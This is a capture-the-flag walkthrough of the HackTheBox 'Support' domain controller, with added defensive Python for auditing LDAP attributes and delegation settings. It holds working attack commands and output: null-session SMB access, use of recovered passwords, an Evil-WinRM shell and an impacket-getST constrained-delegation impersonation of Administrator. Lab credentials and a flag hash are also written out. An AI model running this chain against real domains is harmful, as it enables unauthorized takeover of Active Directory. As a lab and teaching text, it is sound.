❯ nmap -sS -Pn -n -vvv --open --min-rate 5000 10.10.11.174 -oG port
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
Open ports.
# Nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269 -oN taregt.txt >
Nmap scan report for 10.10.11.174
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-02 13:13:57Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: -7h50m53s
| smb2-time:
| date: 2025-05-02T13:14:02
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 2 17:05:33 2025 -- 1 IP address (1 host up) scanned in 50.11 seconds
Versions and services running on each of the ports.
We confirm the domain name and add it to our /etc/hosts.
smbclient
❯ smbclient -L //10.10.11.174/ -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
support-tools Disk support staff tools
SYSVOL Disk Logon server share
We list the available shares.
❯ smbclient //10.10.11.174/support-tools -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jul 20 13:01:06 2022
.. D 0 Sat May 28 07:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 07:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 07:19:55 2022
putty.exe A 1273576 Sat May 28 07:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 07:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 13:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 07:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 07:19:43 2022
4026367 blocks of size 4096. 970866 blocks available
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
We connect to the share with a null session and download everything we find.
❯ 7z x UserInfo.exe.zip
7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
64-bit locale=en_US.UTF-8 Threads:32 OPEN_MAX:1024
Scanning the drive for archives:
1 file, 277499 bytes (271 KiB)
Extracting archive: UserInfo.exe.zip
--
Path = UserInfo.exe.zip
Type = zip
Physical Size = 277499
Everything is Ok
Files: 12
Size: 652675
Compressed: 277499
❯ ll
.rwxrwxr-x kali kali 12 KB Fri May 27 13:51:05 2022 UserInfo.exe
We extract UserInfo.exe and move on to analyzing the binary.
Binary Analysis
We will use our own Windows machine for the analysis, so we boot it, connect to it and transfer the files to be analyzed together with dnSpy.
Stepping to the next instruction in the debugger, we see that the password variable holds a value that looks like an unencoded password.
LDAP Enumeration
❯ ldapdomaindump -u 'support.htb\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' 10.10.11.174 -o ldap
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
❯ cd ldap
❯ pwd
/home/kali/Desktop/HackTheBox/Support/content/ldap
Now let's look at the information: open the browser and point it at the directory where you saved the dump.
The user we currently hold valid credentials for is not a member of Remote Management Users, so we cannot connect with it; only the support user is a member.
❯ ldapsearch -x -H ldap://10.10.11.174 -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" | grep 'info'
y with information about license issuance, for the purpose of tracking and re
298939 for more information.
info: Ironside47pleasure40Watchful
This looks like a leaked password or some other piece of sensitive information attached to an Active Directory object. To find out which user it belongs to we can use NXC.
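A defender can catch this class of exposure before anyone else does by auditing free-text attributes for password-like strings. The following added Python example (not part of the original writeup or of any tool it uses) parses ldapsearch LDIF output, including folded continuation lines like the one above, and flags info/description/comment values that look like credentials; the LDIF it scans is a constructed sample, not the real dump.

```python
import re

WATCHED = {"info", "description", "comment"}   # free-text attributes where notes (and passwords) end up
SECRET_RE = re.compile(r"^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)\S{12,}$")  # 12+ chars, upper+lower+digit

def parse_ldif(text):
    """Yield (dn, {attr: [values]}) from ldapsearch LDIF: a leading space continues
    the previous (folded) line, '#' lines are comments, a blank line ends an entry."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    dn, attrs = None, {}
    for line in lines + [""]:                    # trailing "" flushes the last entry
        if line.startswith("#"):
            continue
        if not line:
            if dn is not None:
                yield dn, attrs
            dn, attrs = None, {}
            continue
        key, _, value = line.partition(": ")
        if key.lower() == "dn":
            dn = value
        else:
            attrs.setdefault(key.lower(), []).append(value)

def find_secret_like_values(text):
    """Return (dn, attribute, value) for watched attributes holding a password-like token."""
    hits = []
    for dn, attrs in parse_ldif(text):
        for attr in WATCHED.intersection(attrs):
            for value in attrs[attr]:
                if any(SECRET_RE.match(tok) for tok in value.split()):
                    hits.append((dn, attr, value))
    return hits

# Constructed sample (not the real dump); the info value is the one found above.
SAMPLE_LDIF = """\
dn: CN=support,CN=Users,DC=support,DC=htb
info: Ironside47pleasure40Watchful

dn: CN=ldap,CN=Users,DC=support,DC=htb
description: Service account used b
 y the helpdesk portal for lookups
"""
```

Running `find_secret_like_values` over a full `ldapsearch -x ... -b "DC=support,DC=htb"` dump reports only the entries worth a closer look instead of the whole directory.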
NXC
❯ nxc smb 10.10.11.174 -u UserAd -p Pass 2>/dev/null | grep -vE '[-]'
SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.174 445 DC [+] support.htb\support:Ironside47pleasure40Watchful
OK, the password is valid for the support user. Recall that this user is a member of Remote Management Users, so we can connect to the machine.
Evil-WinRM
❯ evil-winrm -i 10.10.11.174 -u 'support' -p 'Ironside47pleasure40Watchful'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\support\Documents> cd ..//Desktop
*Evil-WinRM* PS C:\Users\support\Desktop> more user.txt
6f1d193d0fed22a0c56bc47b6ded4f1f
*Evil-WinRM* PS C:\Users\support\Desktop>
We have the first flag.
BloodHound
❯ bloodhound-python -u 'support' -p 'Ironside47pleasure40Watchful' -c All --zip -ns 10.10.11.174 -d support.htb
INFO: Found AD domain: support.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.support.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 21 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Management.support.htb
INFO: Querying computer: dc.support.htb
INFO: Done in 00M 08S
INFO: Compressing output into 20250502204714_bloodhound.zip
Now let's look at it graphically.
Privilege Escalation
Constrained Delegation to Gain Unauthorized Access
Evil-WinRM* PS C:\Users\support\Documents> net groups
Group Accounts for \\
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
*Shared Support Accounts
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\support\Documents>
We are members of the Shared Support Accounts group.
This Shared Support Accounts group has rights over the DC.
We transfer the tools we are going to need.
This article explains how it is exploited and the tools you will need.
❯ impacket-getST -spn cifs/dc.support.htb -impersonate Administrator -dc-ip 10.10.11.174 support.htb/FakeComputer$:Password123456 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache
❯ export KRB5CCNAME=Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache
The impacket-getST command above performs a Resource-Based Constrained Delegation (RBCD) attack to obtain access as Administrator on the domain controller (DC).
The goal is to impersonate the user "Administrator" to a service (here cifs, the SMB service on the DC) using a fake machine account (FakeComputer) that we control and that the DC has been tricked into trusting with certain delegation rights.
In other words, the DC believes FakeComputer is authorized to act on behalf of any user (such as Administrator) when accessing its services, thanks to the malicious configuration applied earlier with PowerView.
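From the defender's side, the setting this attack relies on is the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the DC's computer object. The following added Python example (not from the original writeup or from Impacket/PowerView) decodes that attribute's self-relative security descriptor and lists which SIDs each computer trusts for delegation, so an unexpected entry such as a freshly created machine account stands out in an audit; the SIDs and the sample computer list are constructed placeholders.

```python
import struct

def parse_sid(buf, off):
    """Decode a binary SID at buf[off] into S-1-... form."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs))

def allowed_to_act_sids(sd):
    """SIDs granted by ACCESS_ALLOWED ACEs in a self-relative security descriptor.
    msDS-AllowedToActOnBehalfOfOtherIdentity holds such a descriptor: every SID
    in its DACL is a principal the computer trusts to act on behalf of other users."""
    _rev, _sbz, control, _own, _grp, _sacl, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if not (control & 0x0004) or dacl_off == 0:        # SE_DACL_PRESENT unset: nothing granted
        return []
    ace_count = struct.unpack_from("<BBHHH", sd, dacl_off)[3]   # ACL header: rev, sbz, size, count, sbz
    off, sids = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == 0x00:                            # ACCESS_ALLOWED_ACE: 4-byte mask, then SID
            sids.append(parse_sid(sd, off + 8))
        off += ace_size
    return sids

def audit_rbcd(computers):
    """computers: (sAMAccountName, attribute bytes or None) pairs as an LDAP query
    for msDS-AllowedToActOnBehalfOfOtherIdentity would return them. Returns only
    the accounts that have delegation configured, with the SIDs they trust."""
    return {name: allowed_to_act_sids(sd) for name, sd in computers if sd}

# --- constructed sample data (placeholders, not captured from the target) ---
def build_sid(sid):
    parts = sid.split("-")
    subs = [int(p) for p in parts[3:]]
    return bytes([1, len(subs)]) + int(parts[2]).to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def build_sd(sids):
    """Minimal self-relative SD with one ACCESS_ALLOWED ACE (full control) per SID."""
    aces = b"".join(struct.pack("<BBHI", 0x00, 0, 8 + len(s), 0x000F01FF) + s for s in map(build_sid, sids))
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(sids), 0) + aces
    return struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20) + acl  # SE_SELF_RELATIVE | SE_DACL_PRESENT

FAKE_COMPUTER_SID = "S-1-5-21-1111111111-2222222222-3333333333-1601"   # placeholder, not a real SID
SAMPLE_COMPUTERS = [("DC$", build_sd([FAKE_COMPUTER_SID])), ("Management$", None)]

if __name__ == "__main__":
    for name, sids in audit_rbcd(SAMPLE_COMPUTERS).items():
        print("%s trusts for delegation: %s" % (name, ", ".join(sids)))
```

In a real audit the second element of each pair is the raw attribute value returned by an LDAP query; a DC whose descriptor names anything other than the accounts you deliberately configured is the finding.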